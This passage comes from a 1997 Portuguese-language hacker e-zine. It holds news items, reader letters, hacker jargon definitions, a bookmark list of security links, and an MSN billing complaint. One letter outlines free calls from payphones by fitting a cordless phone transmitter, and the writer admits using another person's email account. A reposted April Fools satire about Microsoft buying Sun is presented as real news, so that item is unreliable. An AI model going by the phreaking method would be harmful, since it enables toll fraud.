pensou no Windows de Bill Gates ou em alguma criacao do Steve Jobs. O
sistema escolhido e um Linux, distribuido de graca na Internet, que esta em
5 milhoes de computadores no mundo todo. Esse sistema alternativo surgiu a
partir de uma ideia do finlandes Linus Thorvald em 1990 e se desenvolveu
com a colaboracao de mais de 200 especialistas no mundo virtual. 'O Linux e
o sucessor moderno do sistema UNIX, desenvolvido nos anos 60 e 70 nos
laboratorios Bell, da AT&T', afirma Bruce Perens, colaborador no projeto do
Linux, que tambem trabalhou na animacao do filme Toy Story. Para os
cientistas da Nasa, o Linux e mais confiavel do que todos os sistemas
operacionais disponiveis comercialmente."

Tai pessoal uma prova in contest de que o Linux esta quente nas paradas.

Saudacoes.


Subject: [LINUX-BR] Micro$oft vai comprar a Sun Microsystems

   Pasmem com as afirmacoes do Bill. . .
   Noticia fresquinha. . .

   []'s, G.

>Date: Mon, 31 Mar 1997 17:04:01 -0800
>From: mas@acm.org (Mark Stalzer)
>Subject: Microsoft buys Sun
>
>This item may be of some interest to RISKS readers, given all of the
>discussions about ActiveX and Java. -- Mark
>
> - - - - - - - - - - - - - - -
>
>Redmond WA, March 31 (Routers) - Microsoft Corporation announced after the
>close today that it will buy Sun Microsystems in a deal valued at $11.7
>billion.  The price works out to $50 a share, which is a premium over Sun's
>close at $34.  Microsoft will finance the deal by issuing 50 million shares
>of common stock, using some of its cash reserves, and borrowing $5 billion
>at "very low rates" from a "long time strategic partner" rumored to be Intel
>Corporation.  Every 4 shares of Sun stock will be exchanged for 1 share of
>newly issued Microsoft stock plus approximately $100 in cash.
>
>Bill Gates, Microsoft's Chairman said "It's time to kill Unix.  Unix is
>providing stiff competition to Windows NT in the server arena.  We have
>already placed NT on Digital and HP servers, and Sun was the only
>substantial holdout.  So we decided just to purchase Sun to assure that
>their servers ship with NT."  He continued, "We also wanted control over
>Java to better position ourselves to, uh, compete with Netscape."
>
>The deal was approved earlier today by the boards of both companies.  Large
>institutional holders of Sun are known to favor the deal so it should get
>shareholder approval in the coming weeks.  Privately, a Sun board member
>said "the price was so sweet, we would be violating our responsibility to
>the shareholders if we didn't accept the offer."  Scott McNealy, Chief
>Executive Officer of Sun, was unavailable for comment.  Several Sun
>employees expressed dismay, one adding simply that "this sucks."
>
>When asked about transition plans for Solaris, Sun's version of Unix, Taj
>Raji, Sun's Vice President of Systems Software, said that the "Solaris APIs
>will be wrapped around the NT megakernel in a seamless fashion to produce a
>robust feature-rich operating environment."  A Microsoft spokesperson
>quickly added that "only native NT applications certified by Microsoft get
>to use the flying windows logo."
>
>Speculation about Intel's possible involvement centered on the SPARC chips
>that power Sun's servers.  Intel might incorporate the SPARC architecture
>into their planned Hexium "You're Inside" family of processors.  If these
>chips were used in Sun servers, analysts say that Intel would lock up the
>worldwide processor market.
>
>As for Sun's Java technology, if Microsoft follows their standard practice,
>they will make proprietary enhancements to assure market share.  One insider
>suggested that they might make "Java more like C++", but others said that
>would be foolish.  April Austin, a technology analyst with Hambust-Quick in
>Oakland CA, commented that "the buyout could really put a crimp on Netscape
>since Microsoft will control the two major means of placing active content
>on the web, ActiveX and Java.  Microsoft will set the standards and Netscape
>will always be six months behind the feature curve."
>
>A spokesperson for the Department of Justice said there was no official
>comment on the proposed transaction.  Although, a highly placed Justice
>source felt that there shouldn't be any problems because "Microsoft is a
>software company and Sun is a hardware company."
>
>The combined company's yearly sales will be approximately $16 billion based
>on end-of-year figures.  For the day, Microsoft (MSFT.O) was up 1 5/8 at 97
>7/8 and Sun (SUNW.O) was up 3 3/4 at 34.  Officials at the Pacific Stock
>Exchange reported that the volume on Sun April 30 calls was 15 times
>normal.  The SEC is investigating possible insider trading.
>
>------------------------------

Sobre  o  artigo  "Curriculo  Vitae e o  Fussador  de  Micro"  me
enviaram isto p. complementar.

    Jovens  na  faixa  dos 20 anos nao tem lealdade  a  empresa,   mas
    querem subir rapidamente na profissao
    (Tirado do Estado de Sao Paulo - 29/set/96)
    JOANN MULLER
    The Boston Glose

        Os jovens na faixa dos 20 anos estao ingressando nos locais de
    trabalho  dos Estados Unidos e se afirmando de uma maneira  jamais
    imaginada pelas geracoes anteriores.

        E quem podem censura-los por isso? Convencidos de que nada  se
    ganha escalando pacientemente os degraus do poder nas empresas, os
    trabalhadores da chamada  "Geracao X" -nascidos entre 1964 e  1975
    -  estao exigindo poder e status irnediatamente. Se  percebem  que
    nao estao entrando no circos dos poderosos e influentes nem  estao
    conseguindo  as  qualificacoes de que precisam para  melhorar  sua
    carteira,  esses jovens nao se importam absolutamente em mudar  de
    emprego.

        Isso  criou  um  novo hiato entre as geracoes  nos  locais  de
    trabalho  dos  Estados  Unidos. Os  chefes  da  geracao  anterior-
    nascidos  entre 1946 e 1964-se queixam de que os  "pirralhos"  tem
    pouca  capacidade de concentracao e carecem de uma forte etica  do
    trabalho. Ou, entao, sao rudes, ambiciosos e impacientes.

        Os  trabalhadores  mais jovens afirmam que tais  atitudes  sao
    .simples  mente uma tatica de sobrevivencia para uma  geracao  que
    foi testemunha de macicas demissoes na decada de 90 e concluiu que
    a lealdade a uma empresa e perda de tempo.

        "Nos Ihes ensinamos que ser leal nao e mais uma coisa segura",
    disse Clama Pmines, de 49 anos, consultora de empresas de DemTer e
    autora  do livro Twentysomething: Managing and Motivating  Today's
    New  Work Force (Vinte e Poucos: Administrando e Motivando a  Nova
    Forca de Trabalho) "Nao e sinal de inteligencia comprometer-se com
    a companhia."

    Mudancas-Desse  conflito  de gerenciamento  empresarial,  que  poderao
    trazer  mudancas  aos locais de trabalho. Na  realidade,  a  znica
    lealdade que esses novos trabalhadores demonstram e a si proprios.
    Isso  comeca quando eles entram na faculdade, onde sao forcados  a
    assumir a responsabilidade pela propria realizacao profisisional.

        "Estamos incentivando as pessoas a tracar seu proprio  roteiro
    na vida, sem esperar que as companhias o facam, disse Wendy Baker,
    que  dirige o centro profissional do Babson College. E,  para  dar
    mais  destaque  a  esse  ponto, Babson acabou  com  o  "centro  de
    colocacao",  uma especie de bolsa de empregos, que  rotineiramente
    arranjava trabalho para os estudantes mais velhos.

        Contudo,  para  administrar suas proprias carreiras,  a  atual
    geracao de jovens tem um enorme desejo de informacao. Esses jovens
    exigem  que  seus chefes os mantenham informados  a  respeito  das
    decisoes  importantes  e frequentemente querem  dados  atualizados
    sobre o andamento e os planos futuros da companhia

    \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
CARTAS

--------------------------------------
danielbss@pobox.com se apresentou como o  responsavel pela carta
anti-spam ("como ficar preso" parodia da carta "como ficar rico
pela internet"). Veja bem. Ele assumiu a autoria da parodia, nao
da original, que apareceu em tudo quanto e' lista de discussao..
--------------------------------------

Ola Amigos,

O TechnOraculo e'um zine sobre Internet e Informatica , depois da
versao texto numero 01 lancada recentemente agora quero apresentar a versa=
o
HTML da mesma edicao 01 com todos os recursos que esse formato proporciona=

http://www.geocities.com/SouthBeach/5970/
-------------------------------------

Derneval:

Solicito informacoes sobre alguns termos usados no mundo hacker. Estou
desenvolvendo um material e nao gostaria que a minha interpretacao destes
termos dertupasse o mesmo, por isto, ca estou.
Os termos sao os seguintes;

        wannabe
        looser
        lammer
        cyberpunk
RESPOSTA:

wannabe :  O inicial seria hacker wannabe. E' o cara que so' ouviu falar
de hacking, talvez leu algum livro como o do Shimamura ou do Littman
e quer aprender mais sobre o assunto. O problema e' que a grande maioria
acha que o melhor caminho e' o mais "mastigadinho". Ele quer ser chamado
de "hacker", mas nao quer suar sozinho p. aprender. As vezes algum deles
encontra o caminho.

looser : O cara que so' quer usar o computador como se fosse uma caneta.
Em outras palavras, nao quer aprender nada alem do necessario para digitar
e imprimir um texto. Nao importa de comprar um Pentium com win95 e CDROM
so' pra digitar cartinhas e odeia quando precisa aprender a mexer com
algum programa novo.

lammer :  Varias definicoes. A mais comum e' um cara que finge ser algo
que nao e' (ex. um hacker). Tambem usada contra caras que assumem autoria
de trabalhos que nao sao seus. Um cara que nao merece nenhum respeito pelo
que faz, por ir contra qualquer etica.

cyberpunk : Isso e' invencao da midia. Seria o hacker +++ do futuro. Na
verdade, o termo costuma ser usado por pessoas que querem se referir ao
ambiente meio "blade-runner" do atual estagio das telecomunicacoes. O
pessoal do computer underground americano nao adotou a terminologia, por
lembrar que o termo "punk" nos EUA e' homossexual passivo. Ha' um certo
preconceito contra a palavra cyber, mas esta ja' alcancou uso no CUD.

Uma  definicao  melhor  voce consegue seguindo a carta  abaixo,  tirada  do
linux-br

Subject: [LINUX-BR] Hackers

Para quem ainda tinha alguma duvida sobre a diferenca entre hackers e
crackers, estou deixando uma versao HTMLizada do New Hacker's Dictionary
em http://www.brasil.enemy.org/~claudio/jargon.

--------------------------------------------

USO DE MAIL-BOMBER
>
> Atencao Bando de Lamahs:
>
> A partir de hoje todas as listas acima submetidas estao EXPULSAS da esquina. Os
> imbecis que continuarem
> assinados as listas, receberao diariamente uma chuva de mail flood. 500 por dia
> ta bom?
>
>
> Saudacoes!!
> CyberHack
>

COMENTARIO DO EDITOR:
Isso  foi um caso que rolou na Esquina das Listas ha' algum  tempo.  Alguem
descobriu como usa um mail-bomber e usou para fazer um flood de 900  cartas
para  todas  as listas acima. Uma amostra de como alguem pode  detonar  com
toda  e  qualquer  etica... E' o caso basico do individuo  que  se  vai  se
ferrar, cedo ou tarde, pelo simples fato que faz algo esperando uma  reacao
do mesmo tipo. E acaba sendo pego pelo simples fato de que tem mais de  uma
maneira de se esfolar um gato.

ALGUNS LINKS DO MEU BOOKMARK

http://www.trouble.org/    -    Dan Farmer Internet Survey Sec
http://www.cs.princeton.edu/sip/pub/spoofing.html    -    Secure Internet Programming: Web Spoofing: An Internet Con Game
http://www.wired.com/news/technology/story/2615.html    -    Wired News: DoubleClick Tries to Force Hand into Cookie Jar
http://www.jya.com/whp1.htm    -    William H. Payne News (contra NSA cifers)
http://jya.com/bis_emoney.html    -    BIS - Development of E-Money - Oct 96
http://www.counterpane.com/whycrypto.html    -     Why Cryptography is harder than it looks..
http://www.psionic.com/papers.html    -    Craig Rowland's Technical Papers - TCPIP covert channels
http://www.packet.com/packet/garfinkel/96/47/index2a.html    -    Packet: Simson Garfinkel - Technology - ActiveX
http://www.cstp.umkc.edu/personal/bhugh/dicinfo.html    -    Distributed Internet Crack Info
http://www.cybersnot.com/iebug.html    -    Internet Explorer Bug
http://web.mit.edu/crioux/www/ie/index.html    -     Internet Explorer Does it Again
http://dec.dorm.umd.edu/iebug.html     -    Yet another  Internet  Explorer
bug: Examples
http://www.webcomics.com/shockwave/    -    Shockwave Security Alert
http://jya.com/dfa.htm    -    Biham/Shamir Differential Fault Analysis  of
DES
http://www.cl.cam.ac.uk/users/rja14/tamper.html    -    Tamper Resistance -
a Cautionary Note
http://www.privacy.org/pi/activities/idcard/    -    PRIVACY  INTERNATIONAL
- National ID Cards Page
http://www.inch.com/~dna/CIMWelcome.html -  Museu de Inteligencia
http://linuxwww.db.erau.edu/NAG/nag.html         -         The      Network
Administrators' Guide Linux
http://electron.phys.dal.ca/nag/ghindex.html       -        The     Network
Administrators' Guide
http://www.osf.org/~loverso/javascript/     -    JavaScript  Problems  I've
Reported
http://Lisa.engelska.se/winnuke/    -    Nuked - win nt attacks
http://206.244.69.158/    -    MyDesktop.com
http://www.nd.edu/~mchapple/iw/start.html    -    Information Warfare
http://www.psycom.net/iwar.1.html     -    Information Warfare, I-War,  IW,
C4I,  Cyberwar
http://www.seas.gwu.edu/student/reto/infowar/info-
war.html#http://www.seas.gwu.edu/student/reto/papers/     -     Information
Warfare - definition
http://www.seas.gwu.edu/seas/instctsp/DOCS/BOOK/book.html    -     BUILDING
IN BIG BROTHER - book
http://www.ndu.edu/ndu/inss/actpubs/act003/a003cont.html     -     What  is
information warfare?
http://www.rand.org/publications/RRR/RRR.fall95.cyber/    -     Information
War and Cyberspace Security
http://www-personal.umd.umich.edu/~nhughes/htmldocs/micro.html            -
Microserfs - WIRED 2.01
http://www.netforward.com/poboxes/?fradim - Uma coisa sobre livro
http://www-personal.umd.umich.edu/~nhughes/htmldocs/nsa.html     -      NSA
Handbook
http://www.webcom.com/~~pinknoiz/coldwar/microwave.html     -     Microwaves
and Mind Control
http://www.cdsar.af.mil/apj/morris.html       -       Weapons    of    Mass
Protection...
http://www.jedefense.com/jed.html/    -    Journal of Electronic Defense
http://www.geocities.com/hotsprings/3368 - Lesoes por esforco repetitivo
http://www.aimnet.com/~jnavas  - Excelente tutorial sobre modens
http://www.sns-access.com/%7Enetpro/maxmtu.htm   -   Como   aumentar    sua
velocidade de carregamento de binarios no netscape e etcs..

----------------------------------------------
URGENTE:

EM  VIRTUDE DE UM PROBLEMA COM MINHA CORRESPONDENCIA, NAO PUDE ATUALIZAR  A
LISTA DE PESSOAS QUE SE DISPUSERAM A "HOSPEDAR" O BARATA ELETRICA NAS  SUAS
WEB  PAGES.  SOUBE QUE TEM PESSOAS FAZENDO "MIRRORS" E ATE'  MESMO  FAZENDO
VERSOES HTML DO BE. EU PENSO DA SEGUINTE MANEIRA: OU EU PONHO TODOS OU  NAO
PONHO  NENHUM  NOVO  ATE' A PROXIMA EDICAO. PECO DESCULPAS  PELA  FALTA  DE
ATENCAO.  DE QUALQUER FORMA, PESSOAS QUE ESTIVEREM INTERESSADAS EM  COLOCAR
O  URL  DE  SUAS PAGINAS NO BARATA ELETRICA, DESDE QUE  NAO  TENHAM  COISAS
COMERCIAIS,  MANDEM  PRA rato.cpd@digicron.com  E SUBJECT DO  TIPO:  "MINHA
PAGINA" COM O URL.
QUANTO  AOS  QUE  ESTAO, POR ALGUMA RAZAO, DOIDOS PARA LER O  BE  EM  HTML,
AGUARDEM QUE NOS PROXIMOS DIAS TA' SAINDO... O 15 JA' TEM VERSAO EM HTML NO
PRELO   (falta   so'  corrigir  os  acentos  e  cedilhas,   a   versao   no
http://www.inf.ufsc.br/barata/ nao e' a definitiva)

O  TOP_QUARK@GEOCITIES.COM JA' ERA. O HACKER CRACKDOWN SERA' RETOMADO.  NAO
ENVIEM  MENSAGENS  PARA TOP_QUARK PORQUE ELE JA' PERDEU O  ACESSO  A  CONTA
EMAIL  DELE NA GEOCITIES. PORQUE? NAO FOI PARANOICO BASTANTE E  ESQUECEU  A
SENHA.  DESCOBRIRAM  TAMBEM QUE ELE TINHA TENDENCIAS A PARTICIPAR  DISSO  E
CORTARAM  A CONTA PARA ONDE A SENHA ERA ENVIADA. DESSE JEITO.  ISSO  TAMBEM
PODE  ACONTECER  COM  VOCE. E O PIOR E' QUE EU  AVISEI...  ELE  CONTINUA  A
EXISTIR NA REDE, MAS O EMAIL TOP_QUARK@GEOCITIES NAO EXISTE MAIS.

HA'  UMA MONTANHA DE PROJETOS. O DE COLOCAR LINKS DE BRASILEIROS NO BE  VAI
FICAR PRO PROXIMO NUMERO. COM O PROBLEMA DO TOP_QUARK, RESOLVI QUE QUALQUER
PROJETO DO BE TEM QUE SER LEVADO EM CONSIDERACAO A LEI DE MURPHY.  UM OUTRO
PROJETO  E' VISITAR ALGUNS LOCAIS DE ENCONTROS DE HACKERS AQUI  NO  BRASIL.
TUDO  DEPENDENDO  DE  UMAS COISAS QUE NA ULTIMA  HORA  PODEM  RESOLVER  NAO
FUNCIONAR...

+++++++++++++++++++++++++++++++++++++
O DESFECHO DO CASO Do MICROSOFT NETWORK

submeta informatica-jb, www-jb, ciberespaco, internet, solucionatica-jb

Amigos,
Conforme prometido, passo o relato abaixo, de como resolvi, da forma um
pouco CARA, mas DE VEZ, o problema enfrentado (e relatado anteriormente),
na Microsoft Network.
HOJE, o "suporte telefonico" da Microsoft no Brasil, que deu OCUPADO varias
vezes, a seguir,  me deixou "PENDURADO"ouvindo uma musiquinha, por varios
minutos, a qual, CERTAMENTE, nao poderia me ajudar.
Ao ser atendido pela, Sra. KELLY (011-8710090 12:20h, HORARIO DE BRASILIA),
me foi dito, pela mesma, que iria checar meu cadastro pelo numero do meu
telefone, aguardei cerca de 15minutos (ligacao INTERURBANA, de Recife para
Sao Paulo) mas, ela NUNCA RETORNOU. A ligacao CAIU, afinal.
Insisti, atraves de OUTRA LIGACAO, mais musiquinha, por cerca de 12
minutos, e o SR. SANDRO, me disse que, INFELIZMENTE, o suporte TECNICO nao
poderia fazer nada, e que eu teria que entrar em contato com a AREA
COMERCIAL, no telefone (011-8225764). Sra Juciane (da area comercial), me
disse que o CANCELAMENTO do "NETWORK", tinha que ser feito nos EUA, no
numero 00-1-813-5791668.
Perguntei se era um NUMERO GRATIS (tipo 0800), mas ela afirmou que "NAO
SABIA INFORMAR".
E preciso se registrar, que TODOS os acima, foram SUPER EDUCADOS (embora,
tambem fossem MUITO BEM TRATADOS POR MIM).
Quando liguei para os Estados Unidos ADIVINHEM: GRAVACAO POR MAIS 12
MINUTOS(LIGACAO INTERNACIONAL).
A exemplo das outras ligacoes (so que agora em INGLES): "sorry, all our
attendants are presently attending other MSN MEMBERS. WE APPRECIATE YOU
PATIENCE. You will be attended by the next available agent".
Perguntava-me: QUANDO?
Esperei uns 10 minutos (EM UMA LIGACAO INTERNACIONAL, REPITO), quando fui,
FINALMENTE, atendido pelo Sr. Oliver, TAMBEM, muito educado, QUE RESOLVEU o
meu problema, DEBITANDO ao meu novo cartao o valor de US$ 281.00 e
ENCERRANDO MINHA CONTA, conforme solicitado por mim.
Eu, obviamente, protestei, pelo fato de NAO TER ACESSADO A REDE, A NAO SER
PARA DOWNLOAD DO PROPRIO SOFTWARE DE ACESSO A ELS, VIA INTERNET, TODAS AS
VARIAS VEZES QUE TIVE QUE REINSTALAR O WIN95, em portugues, no meu
computador, mas como queria EVITAR MAIORES PROBLEMASNO MOMENTO, pedi-lhe
que voce em frente, mas que ME ASSEGURA-SE que a conta seria,
DEFINITIVAMENTE, ENCERRADA .
Vale salientar que ANTES DISSO, o mesmo me falou algumas coisas
interessantes:
1. Nao seria necessario EU ligar para eles, ANTES, CANCELANDO A CONTA?
2. Nao era um pouco TARDE, para eu ligar agora, pleiteando NAO PAGAR (mesmo
apesar de NAO TER USADO?
3. Perguntou-me tambem, se eu EFETIVAMENTE, nao tinha usado a NETWORK, ao
qual respondi, por OBVIAS RAZOES MORAIS, que APENAS FIZ O DOWNLOAD DO
SOFTWARE DE ACESSO, A PROPRIA NETWORK (que para os DESAVISADOS, e feito VIA
MODEM, ligacao INTERNACIONAL, e toda vez que se faz uma reinstalacao do
window95, por qualquer razao tecnica, alem de demorar cerca de 30 minutos,
cada DOWNLOAD).
Ai quem perguntou fui eu: e ELES, nao deveriam, PELO MENOS, passar um email
para o seus usuarios dizendo: "VOCE ESTA SENDO DEBITADO, mas nao esta
usando"? Ou melhor: depois de uns 60 dias,  ENCERRAR  a conta,
simplesmente?
4. Que a partir de Janeiro, o acesso ao suporte da MSN, nos EUA, em
Espanhol, nao mais existira (eu disse para ele, que EU ate, que poderia
resolver em INGLES, MAS SERIA JUSTO, que a maioria doss brasileiros nao
tivessem
um SUPORTE AQUI???)!!!
Parece-me que, JA QUE COMPREI UM PRODUTO EM PORTUGUES, deveria ter um
suporte "MAIS RAZOAVEL", nao e?
E aqueles, que nao tem acesso a lingua Inglesa, e/ou a ligacoes
INTERURBANAS E INTERNACIONAIS?
E como bem disse um caro amigo: OLHA QUE EU, SEMPRE, QUIZ RESOLVER O
ASSUNTO, SEM DISCUSSAO. Imaginem se eu fosse (COM MUITA RAZAO), brigar
pelos US$ 281.00?
O que seria de mim???
Acho que os DEMAIS usuarios TEM DIREITO A SABER DA MINHA EXPERIENCIA, e por
esta razao, faco este relato, esperando que o mesmo lhes seja util.
Grande abraco,
E v a l d o   W.
ex-usuario da The Microsoft Network

ADENDO: SE A MICROSOFT QUISER DIVULGAR ALGUMA NOTA COMENTANDO ACIMA, SAI NO
PROXIMO BE.

Subject: It



BrasLlia,                                       18 de janeiro de 1997


Caro Derneval,



        Aqui  no  Itama&&Y, houve um debate sobre a  censura  da  internet,
conclus^So: o governo n^So quer controlar a internet no Brasil, quer deixa-
la  a  solta, o que eles querem controlar s^So os provedores de  acesso   e
melhorar o sistema de vigilancia telefonica aqui no Brasil principalmete no
Distrito  federal,  aqui  onde os crackers sao os filhos  e  sobrinhos  dos
parlamentares,   ele  tem  acesso  a  muita  informaA^So  util,   os   seus
crackerzinhos  vao  na  telebrasilia(igual a telesp ai)  e  na  embratel  e
pegam,mexem  remexem nas bibliotecas, sabem como funciona a transmissao  de
sinais e ainda eles tem informacoes da policia federal de GRA+A!!!
Alguns sao gentils nao saem vandalizando tudo, so as bbs da vida, H...
aqui as coisas sao assim. Gostei do artigo sobre Phreaker, gostaria de
acrecentar que aqui em brasilia  poucos sabotam os telefones azuis, nem
os vermelho nem os de cartao da' muito trabalho, aqui o pessoal que
"Saca"  compra  um telefone destes sem fio(tipo made in Paraguai)  faz  uma
adaptac^So( que nao sei como se faz e se viesse a saber nao diria).  Coloca
o transmissor no telefone(azul,vermelho ou de cartao) e pronto!
faz-se  varias  ligacoes  e  nao se  paga,  para   a  companhia  telefonica
localizar isto leva trabalho mas tem como , utilizando um scanner de sinais
e  um  analizador de espectro, mais informacoes voce pode  ter  sobre  como
Shimomura  prendeu  kevin( O pirata eletronico e o samurai,  nao  lembro  a
editora nem o autor).
        So' que tem mais quem saber fazer isso nao faz, e quem faz(tentando
copiar  o  circuito  de uma revistina de  eletronica  qualquer)  e'  preso,
"torturado",etc...
        Bem  ja'vou indo, outra coisa esta conta nao e'minha, e'de um  cara
que  ja'peguei antes. e se quizer publicar meu e-mail na BE tudo  bem,  mas
sem colocar minhas indentificacoes do e-mail como nome, endereco, senao e'o
nome do dono da conta que vai ficar sujo e nao eu.


        Atenciosamente,


                                TINNY TOON


                  ---------------------------------------
Subject: Proposta


Bom voce nao me conhece e eu nao te conheco, e espero que voce nao divulgue
este mail. Estou em um projeto governamental, o qual seu objetivo e' manter
a integridade de suas informacoes, ou seja manter informacoes sigilosas do
governo longe de hackers idiotas, gostaria de saber se ha interesse de
participar deste projeto ?

Agradeco desde ja sua atencao.

MD.

RESPOSTA: O que eu acho incrivel e' que o cara nao so' me mandou esta carta
nao  criptografada (tudo bem, nao to lendo carta criptografada de  ninguem,
atualmente)  e ainda por cima de um servidor famoso. Quer dizer, se o  cara
e'  do governo ou trabalha pro governo, como e' que nao tem conta  internet
num gov.br da vida? Se nao e' pra divulgar tambem, porque nao criptografou.
E nem falou em grana.. Por ultimo, todo mundo com um pouco de cerebro  sabe
que  ninguem  trabalha  pro  governo sem ser concursado.  Os  que  nao  sao
concursados  trabalham  p.  uma faccao do governo, que  pode  ser  deputado
fulano de tal, ciclano de tal ou ate' um "Bob Fields" da vida...

            ---------------------------------------------------






                               BIBLIOGRAFIA
                               ============

A  piada  do texto estenografia foi  enviada para a lista de  piadas-l  por
Matheus
O artigo de esteganografia foi baseado em busca pelo Yahoo e Lycos (palavra
chave Steganography) alem  de trechos do livro "The Code-breakers" do Khan
O  artigo sobre o Mitnick foi tirado da pagina do mesmo (sem permissao)  no
http://www.2600.com
Os faqs dos encontros foram tirados do alt.2600
Links e lances do genero estao detalhados em seus respectivos lugares.
A entrevista foi retirada do numero 1 da revista argentina "Virus  Report",
hoje extinta.
Para assinar a lista MeuPovo, envie msg
para MAJORDOMO@ACTECH.COM.BR, contendo,na 1a linha da msg, o texto:
SUBSCRIBE MEUPOVO
              -----------------------------------------------

Volta  Indice  Proxima